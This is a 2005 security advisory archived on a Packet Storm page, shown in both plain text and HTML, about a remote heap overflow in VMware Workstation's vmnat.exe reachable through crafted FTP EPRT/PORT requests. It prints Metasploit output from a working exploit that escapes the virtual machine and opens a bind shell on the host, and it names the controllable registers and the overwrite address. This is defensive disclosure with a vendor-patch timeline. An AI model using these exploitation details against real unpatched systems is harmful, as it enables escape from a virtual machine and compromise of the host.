exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ACSSEC-2005-11-25-0x1.txt

ACSSEC-2005-11-25-0x1.txt
Posted Dec 28, 2005
Authored by Tim Shelton

ACS Security Assessment Advisory - Remote Heap Overflow - A vulnerability was identified in VMware Workstation (And others) vmnat.exe, which could be exploited by remote attackers to execute arbitrary commands. This vulnerability allows the escape from a VMware Virtual Machine into userland space and compromising the host.

tags | advisory, remote, overflow, arbitrary
SHA-256 | 8e8b39c82e3f13db9886e3ed72d044f15d441c3fafdc12016855eed9b8169a4e

ACSSEC-2005-11-25-0x1.txt

Change Mirror Download
This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C605DF.BCD52910
Content-Type: text/plain



-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
ACS Security Assessment Advisory - Remote Heap Overflow

ID: ACSSEC-2005-11-25 - 0x1

Class: Remote Heap Overflow
Package: VMWare Workstation 5.5.0 <= build-18007
VMWare GSX Server Variants
VMWare Ace Variants
VMWare Player Variants
Exempt: VMWare ESX Server Variants
Build: Windows NT/2k/XP/2k3
Notified: Dec 01, 2005
Released: Dec 21, 2005

Remote: Yes
Severity: High

Credit: Tim Shelton <security-advisories@acs-inc.com>
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

-=[ Background

"VMware Workstation is powerful desktop virtualization software for software
developers/testers and enterprise IT professionals that runs multiple
operating systems simultaneously on a single PC. Users can run Windows,
Linux, NetWare, or Solaris x86 in fully networked, portable virtual machines
- no rebooting or hard drive partitioning required. VMware Workstation
delivers excellent performance and advanced features such as memory
optimization and the ability to manage multi-tier configurations and
multiple snapshots.

With millions of customers and dozens of major product awards over the last
six years, VMware Workstation is a proven technology that improves
productivity and flexibility. An indispensable tool for software developers
and IT professionals worldwide."

-- http://www.vmware.com/products/ws/



-=[ Technical Description

A vulnerability was identified in VMware Workstation (And others) vmnat.exe,
which could be exploited by remote attackers to execute arbitrary commands.
This vulnerability allows the escape from a VMware Virtual Machine into
userland space and compromising the host.

'Vmnat' is unable to process specially crafted 'EPRT' and 'PORT' FTP
Requests.



-=[ Proof of Concept:
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

msf > use vmware_vmnat
msf vmware_vmnat(win32_bind) > exploit
[*] Starting Bind Handler.
[*] VMWare vmnat Remote Heap Exploit by Tim Shelton <security@acs-inc.com>
[*] 220 #### FTP Server Ready.
[*] Login as anonymous/login
[*] Sending evil buffer....
[*] No response from FTP server
[*] Exiting Bind Handler.
vmnat.exe: Access violation when writing to [2F5C2F5C] <- Controllable
Registers

-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

-=[ Breakdown

Control over registers ECX, EDI, EBX will allow you overwrite an available
Heap Header PLINK and FLINK.

EDX points to your buffer on overwrite.

Overwrite located at ntdll.0x7C926A36 Windows XP/SP2 build 2600

-=[ Functioning Overflow of Concept:
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

msf > use vmware_vmnat_0day
msf vmware_vmnat_0day(win32_bind) > exploit
[*] Starting Bind Handler.
[*] VMWare vmnat Remote Heap Exploit 0day by Tim Shelton
<security@acs-inc.com>
[*] 220 #### FTP Server Ready.
[*] Login as anonymous/login
[*] Sending evil buffer....
[*] Got connection from 192.168.79.130:34941 <-> 192.168.79.2:4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\VMware Workstation>

-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-


-=[ Credits

Vulnerability originally reported and exploited by Tim Shelton


-=[ ChangeLog

2005-11-25 : Original Advisory
2005-12-01 : Notified Vendor
2005-12-20 : Vendor released patch, disclosing full information.

------_=_NextPart_001_01C605DF.BCD52910
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
charset=3Dus-ascii">
<META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version =
5.5.2657.88">
<TITLE>[ACSSEC-2005-11-25-0x1] VMWare Workstation 5.5.0 <=3D =
build-18007 GSX Server Variants And Others</TITLE>
</HEAD>
<BODY>
<BR>
<BR>

<P><FONT =
SIZE=3D2>-=3D[++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=
+]=3D-</FONT>
<BR><FONT SIZE=3D2>ACS Security Assessment Advisory - Remote Heap =
Overflow</FONT>
</P>

<P><FONT SIZE=3D2>ID:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
ACSSEC-2005-11-25 - 0x1</FONT>
</P>

<P><FONT SIZE=3D2>Class:&nbsp;&nbsp;&nbsp; Remote Heap Overflow</FONT>
<BR><FONT SIZE=3D2>Package:&nbsp; VMWare Workstation 5.5.0 <=3D =
build-18007</FONT>
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <FONT =
SIZE=3D2>&nbsp;&nbsp;&nbsp; VMWare GSX Server Variants</FONT>
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <FONT =
SIZE=3D2>&nbsp;&nbsp;&nbsp; VMWare Ace Variants</FONT>
<BR><FONT SIZE=3D2>&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp; VMWare Player Variants</FONT>
<BR><FONT SIZE=3D2>Exempt:&nbsp;&nbsp; VMWare ESX Server =
Variants</FONT>
<BR><FONT SIZE=3D2>Build:&nbsp;&nbsp;&nbsp; Windows NT/2k/XP/2k3</FONT>
<BR><FONT SIZE=3D2>Notified: Dec 01, 2005</FONT>
<BR><FONT SIZE=3D2>Released: Dec 21, 2005</FONT>
</P>

<P><FONT SIZE=3D2>Remote:&nbsp;&nbsp; Yes</FONT>
<BR><FONT SIZE=3D2>Severity: High</FONT>
</P>

<P><FONT SIZE=3D2>Credit:&nbsp;&nbsp; Tim Shelton&nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
<security-advisories@acs-inc.com></FONT>
<BR><FONT =
SIZE=3D2>-=3D[++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=
+]=3D-</FONT>
</P>

<P><FONT SIZE=3D2>-=3D[ Background</FONT>
</P>

<P><FONT SIZE=3D2>"VMware Workstation is powerful desktop =
virtualization software for software developers/testers and enterprise =
IT professionals that runs multiple operating systems simultaneously on =
a single PC. Users can run Windows, Linux, NetWare, or Solaris x86 in =
fully networked, portable virtual machines - no rebooting or hard drive =
partitioning required. VMware Workstation delivers excellent =
performance and advanced features such as memory optimization and the =
ability to manage multi-tier configurations and multiple =
snapshots.</FONT></P>

<P><FONT SIZE=3D2>With millions of customers and dozens of major =
product awards over the last six years, VMware Workstation is a proven =
technology that improves productivity and flexibility. An indispensable =
tool for software developers and IT professionals =
worldwide."</FONT></P>

<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <FONT SIZE=3D2>-- <A =
HREF=3D"http://www.vmware.com/products/ws/" =
TARGET=3D"_blank">http://www.vmware.com/products/ws/</A></FONT>
</P>
<BR>
<BR>

<P><FONT SIZE=3D2>-=3D[ Technical Description</FONT>
</P>

<P><FONT SIZE=3D2>A vulnerability was identified in VMware Workstation =
(And others) vmnat.exe, which could be exploited by remote attackers to =
execute arbitrary commands.&nbsp; This vulnerability allows the escape =
from a VMware Virtual Machine into userland space and compromising the =
host. </FONT></P>

<P><FONT SIZE=3D2>'Vmnat' is unable to process specially crafted 'EPRT' =
and 'PORT' FTP Requests.&nbsp; </FONT>
</P>
<BR>
<BR>

<P><FONT SIZE=3D2>-=3D[ Proof of Concept:</FONT>
<BR><FONT =
SIZE=3D2>-=3D[++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=
+]=3D-</FONT>
</P>

<P><FONT SIZE=3D2>msf > use vmware_vmnat</FONT>
<BR><FONT SIZE=3D2>msf vmware_vmnat(win32_bind) > exploit</FONT>
<BR><FONT SIZE=3D2>[*] Starting Bind Handler.</FONT>
<BR><FONT SIZE=3D2>[*] VMWare vmnat Remote Heap Exploit by Tim Shelton =
<security@acs-inc.com></FONT>
<BR><FONT SIZE=3D2>[*] 220 #### FTP Server Ready.</FONT>
<BR><FONT SIZE=3D2>[*] Login as anonymous/login</FONT>
<BR><FONT SIZE=3D2>[*] Sending evil buffer....</FONT>
<BR><FONT SIZE=3D2>[*] No response from FTP server</FONT>
<BR><FONT SIZE=3D2>[*] Exiting Bind Handler.</FONT>
<BR><FONT SIZE=3D2>vmnat.exe: Access violation when writing to =
[2F5C2F5C] <- Controllable Registers</FONT>
</P>

<P><FONT =
SIZE=3D2>-=3D[++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=
+]=3D-</FONT>
</P>

<P><FONT SIZE=3D2>-=3D[ Breakdown </FONT>
</P>

<P><FONT SIZE=3D2>Control over registers ECX, EDI, EBX will allow you =
overwrite an available </FONT>
<BR><FONT SIZE=3D2>Heap Header PLINK and FLINK.&nbsp; </FONT>
</P>

<P><FONT SIZE=3D2>EDX points to your buffer on overwrite.</FONT>
</P>

<P><FONT SIZE=3D2>Overwrite located at ntdll.0x7C926A36 Windows XP/SP2 =
build 2600</FONT>
</P>

<P><FONT SIZE=3D2>-=3D[ Functioning Overflow of Concept:</FONT>
<BR><FONT =
SIZE=3D2>-=3D[++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=
+]=3D-</FONT>
</P>

<P><FONT SIZE=3D2>msf > use vmware_vmnat_0day</FONT>
<BR><FONT SIZE=3D2>msf vmware_vmnat_0day(win32_bind) > =
exploit</FONT>
<BR><FONT SIZE=3D2>[*] Starting Bind Handler.</FONT>
<BR><FONT SIZE=3D2>[*] VMWare vmnat Remote Heap Exploit 0day by Tim =
Shelton <security@acs-inc.com></FONT>
<BR><FONT SIZE=3D2>[*] 220 #### FTP Server Ready.</FONT>
<BR><FONT SIZE=3D2>[*] Login as anonymous/login</FONT>
<BR><FONT SIZE=3D2>[*] Sending evil buffer....</FONT>
<BR><FONT SIZE=3D2>[*] Got connection from 192.168.79.130:34941 =
<-> 192.168.79.2:4444</FONT>
</P>

<P><FONT SIZE=3D2>Microsoft Windows XP [Version 5.1.2600]</FONT>
<BR><FONT SIZE=3D2>(C) Copyright 1985-2001 Microsoft Corp.</FONT>
</P>

<P><FONT SIZE=3D2>C:\Program Files\VMware Workstation></FONT>
</P>

<P><FONT =
SIZE=3D2>-=3D[++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=
+]=3D-</FONT>
</P>
<BR>

<P><FONT SIZE=3D2>-=3D[ Credits</FONT>
</P>

<P><FONT SIZE=3D2>Vulnerability originally reported and exploited by =
Tim Shelton</FONT>
</P>
<BR>

<P><FONT SIZE=3D2>-=3D[ ChangeLog</FONT>
</P>

<P><FONT SIZE=3D2>2005-11-25 : Original Advisory</FONT>
<BR><FONT SIZE=3D2>2005-12-01 : Notified Vendor</FONT>
<BR><FONT SIZE=3D2>2005-12-20 : Vendor released patch, disclosing full =
information.</FONT>
</P>

</BODY>
</HTML>
------_=_NextPart_001_01C605DF.BCD52910--
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close